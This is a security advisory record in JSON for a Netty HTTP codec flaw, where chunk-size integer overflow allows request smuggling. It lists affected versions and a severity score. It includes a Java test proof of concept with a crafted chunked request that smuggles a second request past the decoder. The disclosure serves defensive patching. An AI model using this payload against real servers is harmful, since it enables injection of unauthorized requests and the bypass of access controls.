{"id":"GHSA-m4cv-j2px-7723","summary":"Netty vulnerable to HTTP Request Smuggling due to incorrect chunk size parsing","details":"### Summary\nNetty's chunk size parser silently overflows int, enabling request smuggling attacks.\n\n### Details\nio.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.\n\nThe size is accumulated as follows:\n\nresult *= 16;\nresult += digit;\n\nThe result is checked only for negative values. However, with a carefully crafted chunk size, the result can be a valid size.\n\n### PoC\nThe test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.\n\n```java\n@Test\npublic void test() {\n    String requestStr = \"POST / HTTP/1.1\\r\\n\" +\n            \"Host: localhost\\r\\n\" +\n            \"Transfer-Encoding: chunked\\r\\n\\r\\n\" +\n            \"100000004\\r\\n\" +\n            \"test\\r\\n\" +\n            \"0\\r\\n\" +\n            \"\\r\\n\" +\n            \"GET /smuggled HTTP/1.1\\r\\n\" +\n            \"Host: localhost\\r\\n\" +\n            \"Content-Length: 0\\r\\n\" +\n            \"\\r\\n\";\n\n    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());\n    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));\n\n    // Request 1\n    HttpRequest request = channel.readInbound();\n    assertTrue(request.decoderResult().isSuccess());\n    HttpContent content = channel.readInbound();\n    assertTrue(content.decoderResult().isSuccess());\n    assertEquals(\"test\", content.content().toString(CharsetUtil.US_ASCII));\n    content.release();\n    LastHttpContent last = channel.readInbound();\n    assertTrue(last.decoderResult().isSuccess());\n    last.release();\n\n    // Request 2\n    request = channel.readInbound();\n    assertTrue(request.decoderResult().isSuccess());\n    last = channel.readInbound();\n    assertTrue(last.decoderResult().isSuccess());\n    last.release();\n}\n```\n\n### Impact\nHTTP Request Smuggling: Attacker injects arbitrary HTTP requests","aliases":["CVE-2026-42580"],"modified":"2026-05-14T20:52:01.053039Z","published":"2026-05-07T00:13:05Z","related":["CGA-xcq7-9mqx-6hmq"],"database_specific":{"nvd_published_at":"2026-05-13T19:17:23Z","github_reviewed":true,"github_reviewed_at":"2026-05-07T00:13:05Z","cwe_ids":["CWE-190","CWE-444"],"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/netty/netty/security/advisories/GHSA-m4cv-j2px-7723"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42580"},{"type":"PACKAGE","url":"https://github.com/netty/netty"}],"affected":[{"package":{"name":"io.netty:netty-codec-http","ecosystem":"Maven","purl":"pkg:maven/io.netty/netty-codec-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"4.2.0.Alpha1"},{"fixed":"4.2.13.Final"}]}],"versions":["4.2.0.Alpha1","4.2.0.Alpha2","4.2.0.Alpha3","4.2.0.Alpha4","4.2.0.Alpha5","4.2.0.Beta1","4.2.0.Final","4.2.0.RC1","4.2.0.RC2","4.2.0.RC3","4.2.0.RC4","4.2.1.Final","4.2.10.Final","4.2.11.Final","4.2.12.Final","4.2.2.Final","4.2.3.Final","4.2.4.Final","4.2.5.Final","4.2.6.Final","4.2.7.Final","4.2.8.Final","4.2.9.Final"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-m4cv-j2px-7723/GHSA-m4cv-j2px-7723.json","last_known_affected_version_range":"\u003c= 4.2.12.Final"}},{"package":{"name":"io.netty:netty-codec-http","ecosystem":"Maven","purl":"pkg:maven/io.netty/netty-codec-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.1.133.Final"}]}],"versions":["4.0.0.Alpha1","4.0.0.Alpha2","4.0.0.Alpha3","4.0.0.Alpha4","4.0.0.Alpha5","4.0.0.Alpha6","4.0.0.Alpha7","4.0.0.Alpha8","4.0.0.Beta1","4.0.0.Beta2","4.0.0.Beta3","4.0.0.CR1","4.0.0.CR2","4.0.0.CR3","4.0.0.CR4","4.0.0.CR5","4.0.0.CR6","4.0.0.CR7","4.0.0.CR8","4.0.0.CR9","4.0.0.Final","4.0.1.Final","4.0.10.Final","4.0.11.Final","4.0.12.Final","4.0.13.Final","4.0.14.Beta1","4.0.14.Final","4.0.15.Final","4.0.16.Final","4.0.17.Final","4.0.18.Final","4.0.19.Final","4.0.2.Final","4.0.20.Final","4.0.21.Final","4.0.22.Final","4.0.23.Final","4.0.24.Final","4.0.25.Final","4.0.26.Final","4.0.27.Final","4.0.28.Final","4.0.29.Final","4.0.3.Final","4.0.30.Final","4.0.31.Final","4.0.32.Final","4.0.33.Final","4.0.34.Final","4.0.35.Final","4.0.36.Final","4.0.37.Final","4.0.38.Final","4.0.39.Final","4.0.4.Final","4.0.40.Final","4.0.41.Final","4.0.42.Final","4.0.43.Final","4.0.44.Final","4.0.45.Final","4.0.46.Final","4.0.47.Final","4.0.48.Final","4.0.49.Final","4.0.5.Final","4.0.50.Final","4.0.51.Final","4.0.52.Final","4.0.53.Final","4.0.54.Final","4.0.55.Final","4.0.56.Final","4.0.6.Final","4.0.7.Final","4.0.8.Final","4.0.9.Final","4.1.0.Beta1","4.1.0.Beta2","4.1.0.Beta3","4.1.0.Beta4","4.1.0.Beta5","4.1.0.Beta6","4.1.0.Beta7","4.1.0.Beta8","4.1.0.CR1","4.1.0.CR2","4.1.0.CR3","4.1.0.CR4","4.1.0.CR5","4.1.0.CR6","4.1.0.CR7","4.1.0.Final","4.1.1.Final","4.1.10.Final","4.1.100.Final","4.1.101.Final","4.1.102.Final","4.1.103.Final","4.1.104.Final","4.1.105.Final","4.1.106.Final","4.1.107.Final","4.1.108.Final","4.1.109.Final","4.1.11.Final","4.1.110.Final","4.1.111.Final","4.1.112.Final","4.1.113.Final","4.1.114.Final","4.1.115.Final","4.1.116.Final","4.1.117.Final","4.1.118.Final","4.1.119.Final","4.1.12.Final","4.1.120.Final","4.1.121.Final","4.1.122.Final","4.1.123.Final","4.1.124.Final","4.1.125.Final","4.1.126.Final","4.1.127.Final","4.1.128.Final","4.1.129.Final","4.1.13.Final","4.1.130.Final","4.1.131.Final","4.1.132.Final","4.1.14.Final","4.1.15.Final","4.1.16.Final","4.1.17.Final","4.1.18.Final","4.1.19.Final","4.1.2.Final","4.1.20.Final","4.1.21.Final","4.1.22.Final","4.1.23.Final","4.1.24.Final","4.1.25.Final","4.1.26.Final","4.1.27.Final","4.1.28.Final","4.1.29.Final","4.1.3.Final","4.1.30.Final","4.1.31.Final","4.1.32.Final","4.1.33.Final","4.1.34.Final","4.1.35.Final","4.1.36.Final","4.1.37.Final","4.1.38.Final","4.1.39.Final","4.1.4.Final","4.1.40.Final","4.1.41.Final","4.1.42.Final","4.1.43.Final","4.1.44.Final","4.1.45.Final","4.1.46.Final","4.1.47.Final","4.1.48.Final","4.1.49.Final","4.1.5.Final","4.1.50.Final","4.1.51.Final","4.1.52.Final","4.1.53.Final","4.1.54.Final","4.1.55.Final","4.1.56.Final","4.1.57.Final","4.1.58.Final","4.1.59.Final","4.1.6.Final","4.1.60.Final","4.1.61.Final","4.1.62.Final","4.1.63.Final","4.1.64.Final","4.1.65.Final","4.1.66.Final","4.1.67.Final","4.1.68.Final","4.1.69.Final","4.1.7.Final","4.1.70.Final","4.1.71.Final","4.1.72.Final","4.1.73.Final","4.1.74.Final","4.1.75.Final","4.1.76.Final","4.1.77.Final","4.1.78.Final","4.1.79.Final","4.1.8.Final","4.1.80.Final","4.1.81.Final","4.1.82.Final","4.1.83.Final","4.1.84.Final","4.1.85.Final","4.1.86.Final","4.1.87.Final","4.1.88.Final","4.1.89.Final","4.1.9.Final","4.1.90.Final","4.1.91.Final","4.1.92.Final","4.1.93.Final","4.1.94.Final","4.1.95.Final","4.1.96.Final","4.1.97.Final","4.1.98.Final","4.1.99.Final"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-m4cv-j2px-7723/GHSA-m4cv-j2px-7723.json","last_known_affected_version_range":"\u003c= 4.1.132.Final"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"}]}